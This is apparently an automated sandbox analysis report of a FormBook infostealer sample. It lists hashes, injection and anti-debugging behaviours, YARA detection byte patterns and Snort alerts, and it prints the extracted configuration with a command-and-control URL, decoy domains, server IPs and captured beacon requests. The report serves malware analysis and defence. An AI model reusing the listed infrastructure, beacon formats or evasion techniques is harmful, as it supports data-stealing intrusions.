Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lamsddre43321.exe

Overview

General Information

Sample Name:lamsddre43321.exe
Analysis ID:635151
MD5:b1fcf52deb6f04ef0f898c9938f26920
SHA1:42d8b684ff7b293c0d8ad5de6f67d14d17c0b353
SHA256:8535282c1740725ecf68a65e9ce582a5fe28db4ffcfcd07e6b1516d62cc9dc60
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • lamsddre43321.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\lamsddre43321.exe" MD5: B1FCF52DEB6F04EF0F898C9938F26920)
    • rlpjf.exe (PID: 6484 cmdline: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy MD5: FB06AEE14DBF93907437AB4372B1BBDE)
      • rlpjf.exe (PID: 6520 cmdline: C:\Users\user\AppData\Local\Temp\rlpjf.exe C:\Users\user\AppData\Local\Temp\ojshmy MD5: FB06AEE14DBF93907437AB4372B1BBDE)
        • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6360 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 6148 cmdline: /c del "C:\Users\user\AppData\Local\Temp\rlpjf.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rebelmvmt.com/t23s/"], "decoy": ["jesusandamerican.com", "atlasgreencorp.com", "kristinsullivan.info", "moments2memories904.com", "tipdautu.com", "hucosell.com", "purplelollipops.com", "storywelldesign.com", "gordisex.com", "stratumskincareusa.com", "squishandboo.com", "carolyncareteam.com", "xn--allegon-3ya.com", "trustno1clothing.com", "provectadigital.com", "wellroyal.com", "miapersayis.com", "kutnicki.com", "flexi-tees.com", "oopsbd.com", "transitxl.com", "pacamoro.com", "togethernesslifeyoga.com", "holos-studio.com", "batpigswagsupply.com", "247resumereview.com", "metaverseart.international", "lejeunewatersettlements.com", "xyjdnice.com", "noteworthyandblue.com", "yawtl.top", "hermanmilleronline.com", "officialjabbour.com", "learn2stand.com", "bitrueexc.com", "outdoorfrog.com", "tappong.com", "bumblebeeskin.com", "hometeamdr.com", "theminiquipper.com", "sxqp262.com", "deepspacegamingrust.com", "8hck.com", "qianlaodonghetong.com", "nzyyen.com", "kabuyasu.com", "deooilltd.cfd", "boowang.com", "metadocompositor.com", "walker-shop.com", "jjyg86.com", "fineassmama.com", "quieco.xyz", "musculusbodytherapies.com", "trestoneducation.com", "lookinsoft.com", "leifengrui.top", "24hcares.com", "vanz-travel.com", "tduhe.com", "higginsuotdoors.com", "plazawoods.com", "howlongsoessoftware.com", "mapresults.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.0.rlpjf.exe.400000.7.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.0.rlpjf.exe.400000.7.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.rlpjf.exe.400000.7.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.rlpjf.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.rlpjf.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          Timestamp:192.168.2.3154.221.90.23649759802031449 05/27/22-15:57:04.008947
          SID:2031449
          Source Port:49759
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3154.221.90.23649759802031453 05/27/22-15:57:04.008947
          SID:2031453
          Source Port:49759
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:192.168.2.3154.221.90.23649759802031412 05/27/22-15:57:04.008947
          SID:2031412
          Source Port:49759
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rebelmvmt.com/t23s/"], "decoy": ["jesusandamerican.com", "atlasgreencorp.com", "kristinsullivan.info", "moments2memories904.com", "tipdautu.com", "hucosell.com", "purplelollipops.com", "storywelldesign.com", "gordisex.com", "stratumskincareusa.com", "squishandboo.com", "carolyncareteam.com", "xn--allegon-3ya.com", "trustno1clothing.com", "provectadigital.com", "wellroyal.com", "miapersayis.com", "kutnicki.com", "flexi-tees.com", "oopsbd.com", "transitxl.com", "pacamoro.com", "togethernesslifeyoga.com", "holos-studio.com", "batpigswagsupply.com", "247resumereview.com", "metaverseart.international", "lejeunewatersettlements.com", "xyjdnice.com", "noteworthyandblue.com", "yawtl.top", "hermanmilleronline.com", "officialjabbour.com", "learn2stand.com", "bitrueexc.com", "outdoorfrog.com", "tappong.com", "bumblebeeskin.com", "hometeamdr.com", "theminiquipper.com", "sxqp262.com", "deepspacegamingrust.com", "8hck.com", "qianlaodonghetong.com", "nzyyen.com", "kabuyasu.com", "deooilltd.cfd", "boowang.com", "metadocompositor.com", "walker-shop.com", "jjyg86.com", "fineassmama.com", "quieco.xyz", "musculusbodytherapies.com", "trestoneducation.com", "lookinsoft.com", "leifengrui.top", "24hcares.com", "vanz-travel.com", "tduhe.com", "higginsuotdoors.com", "plazawoods.com", "howlongsoessoftware.com", "mapresults.com"]}
          Multi AV Scanner detection for submitted file
          Source: lamsddre43321.exeVirustotal: Detection: 43%Perma Link
          Source: lamsddre43321.exeReversingLabs: Detection: 39%
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: www.rebelmvmt.com/t23s/Avira URL Cloud: Label: malware
          Source: http://www.nzyyen.com/t23s/?EJETzlAX=iH1VF/JK30KFHZEdKguaUIUWolCdP6M64DY2HrkJBnwp9nXzsO9KixAtEUEE76WvBmG1&8ptH=IbZdvJCPXDLToZQAvira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeReversingLabs: Detection: 36%
          Source: 2.0.rlpjf.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.rlpjf.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.rlpjf.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.rlpjf.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.rlpjf.exe.f70000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: lamsddre43321.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: msiexec.pdb source: rlpjf.exe, 00000002.00000002.387098947.00000000038D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: rlpjf.exe, 00000002.00000002.387098947.00000000038D0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: C:\xhhad\uirflg\frvl\265a3cee655e492f8e5d84a11f9c3616\cgbuhi\tigzjzwb\Release\tigzjzwb.pdb source: lamsddre43321.exe, 00000000.00000002.292027009.000000000040B000.00000004.00000001.01000000.00000003.sdmp, lamsddre43321.exe, 00000000.00000002.296306970.000000000288E000.00000004.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000001.00000000.266573829.00000000001BB000.00000002.00000001.01000000.00000004.sdmp, rlpjf.exe, 00000001.00000002.276856071.00000000001BB000.00000002.00000001.01000000.00000004.sdmp, rlpjf.exe, 00000002.00000000.274730046.00000000001BB000.00000002.00000001.01000000.00000004.sdmp, msiexec.exe, 0000000F.00000002.541755061.00000000054CF000.00000004.10000000.00040000.00000000.sdmp, rlpjf.exe.0.dr, nsrD708.tmp.0.dr
          Source: Binary string: wntdll.pdbUGP source: rlpjf.exe, 00000001.00000003.275456864.000000001DB90000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000001.00000003.271015618.000000001DA00000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000003.279036227.0000000001730000.00000004.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386224443.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386483575.00000000019EF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.387548821.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539164647.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.540524597.00000000050BF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.385962537.0000000004C6A000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: rlpjf.exe, 00000001.00000003.275456864.000000001DB90000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000001.00000003.271015618.000000001DA00000.00000004.00001000.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000003.279036227.0000000001730000.00000004.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386224443.00000000018D0000.00000040.00000800.00020000.00000000.sdmp, rlpjf.exe, 00000002.00000002.386483575.00000000019EF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 0000000F.00000003.387548821.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.539164647.0000000004FA0000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000002.540524597.00000000050BF000.00000040.00000800.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.385962537.0000000004C6A000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00405426 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00405D9C SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_004026A1 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\rlpjf.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.nzyyen.com
          Source: C:\Windows\explorer.exeNetwork Connect: 154.221.90.236 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.204.150.5 80
          Source: C:\Windows\explorer.exeDomain query: www.higginsuotdoors.com
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49759 -> 154.221.90.236:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49759 -> 154.221.90.236:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49759 -> 154.221.90.236:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.rebelmvmt.com/t23s/
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: global trafficHTTP traffic detected: GET /t23s/?EJETzlAX=iH1VF/JK30KFHZEdKguaUIUWolCdP6M64DY2HrkJBnwp9nXzsO9KixAtEUEE76WvBmG1&8ptH=IbZdvJCPXDLToZQ HTTP/1.1Host: www.nzyyen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3XnDT9zdGB1sTbUxM&8ptH=IbZdvJCPXDLToZQ HTTP/1.1Host: www.higginsuotdoors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: msiexec.exe, 0000000F.00000002.541916856.00000000059BF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.higginsuotdoors.com/t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3X
          Source: unknownDNS traffic detected: queries for: www.nzyyen.com
          Source: global trafficHTTP traffic detected: GET /t23s/?EJETzlAX=iH1VF/JK30KFHZEdKguaUIUWolCdP6M64DY2HrkJBnwp9nXzsO9KixAtEUEE76WvBmG1&8ptH=IbZdvJCPXDLToZQ HTTP/1.1Host: www.nzyyen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /t23s/?EJETzlAX=cEalcOUlgQXel0kK38lb//BaRXxUeEtKEp5M3r3CI2ociZMEyQ/3XnDT9zdGB1sTbUxM&8ptH=IbZdvJCPXDLToZQ HTTP/1.1Host: www.higginsuotdoors.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: lamsddre43321.exe, 00000000.00000002.292883892.000000000060A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\Desktop\lamsddre43321.exeCode function: 0_2_00404FDD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.276935355.0000000000F70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.386017392.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.385893356.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.343083736.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.273462399.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.318820789.000000000DA9C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.535983795.0000000000F80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.274763055.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.535866445.0000000000F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.rlpjf.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.rlpjf.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.rlpjf.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.rlpjf.exe.f70000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.rlpjf.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.rlpjf.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.rlpjf.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.rlpjf.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.rlpjf.exe.f70000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.386123564.0000000001820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.535781474.0000000000D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
